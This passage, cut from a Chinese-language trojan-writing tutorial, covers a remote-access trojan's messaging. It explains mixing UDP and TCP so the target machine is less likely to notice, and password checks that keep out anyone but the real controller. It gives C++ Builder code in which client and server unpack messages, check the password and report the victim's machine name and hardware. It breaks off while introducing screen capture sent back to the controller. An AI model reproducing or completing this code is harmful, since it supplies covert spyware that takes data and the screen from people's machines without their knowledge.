#define MsgSetProgramOpenUintLen sizeof(MsgSetProgramOpenUint)

　　#define MsgGetHardWare 35//请求硬件信息(UDP消息)和回传硬件信息(TCP消息)

　　上面一段定义，使用了TCP和UDP两种协议目的就是为了减少TCP连接的几率，这样所消耗的系统资源就会比较少，不容易让目标机察觉。很多木马程序中，都有像上面定义中类似的密码定义，目地是为了防止非真实客户机的连接请求。SNum 为消息操作号，它的作用是为了效验数据是否是发送过的，经过分析而知，我们熟悉的OICQ也正是使用了这一办法来校验消息的。

　　数据协议组织好，还有一步工作，就是数据的打包发送，一般的方法是把全部数据压为一个VOID类型的数据流，然后发送：

　　Msg *msg=new Msg;

　　TMemoryStream *RData=new TMemoryStream;

　　NMUDP1->ReadStream(RData);

　　RData->Read(msg,sizeof(Msg));

　　UdpConnect *udpconnect=new UdpConnect;

　　NetBiosName *netbiosname=new NetBiosName;

　　if(msg->CNum==CNumBak)

　　return;

　　else{

　　CNumBak=msg->CNum;

　　switch(msg->Type)

　　{

　　case 0://MsgUdpConnect

　　RData->Read(udpconnect,sizeof(UdpConnect));

　　checkuser(udpconnect->IsRight);

　　break;

　　case 1:

　　RData->Read(netbiosname,sizeof(NetBiosName));

　　AnsiString jqm="机器名 ";

　　jqm+=(AnsiString)netbiosname->NetBiosName;

　　Memo2->Lines->Add(jqm);

　　break;

　　}

　　}

　　当服务器端收到数据后,首先要做的工作是解包还原VOID流为结构化的协议,这里同样给出事例代码:

　　NMUDP1->RemoteHost=FromIP;

　　NMUDP1->RemotePort=Port;

　　TMemoryStream *RData=new TMemoryStream;

　　NMUDP1->ReadStream(RData);

　　Msg *msg=new Msg;

　　RData->Read(msg,sizeof(Msg));

　　if(msg->CNum==CNumBak)

　　return;

　　else

　　{

　　CNumBak=msg->CNum;

　　switch(msg->Type)

　　{

　　case 0:

　　checkuser(msg->Password);

　　break;

　　case 1:

　　GetNetBiosName();

　　break;

　　case 2:

　　CheckHard();

　　break;

　　}

　　}

　　此外，很多木马程序支持了屏幕回传的功能，其根本的原理是先捕获屏幕画面，然后回传给客户机，由于画面的数据量很大所以，很多木马程序都是在画面改变的时候才回传改变部分的画面，常用的手段是最小矩形法，下面以好友“古老传说”的一段算法举例：　　#define MAXXCount 10 //屏幕X方向最多分割块数[未结束]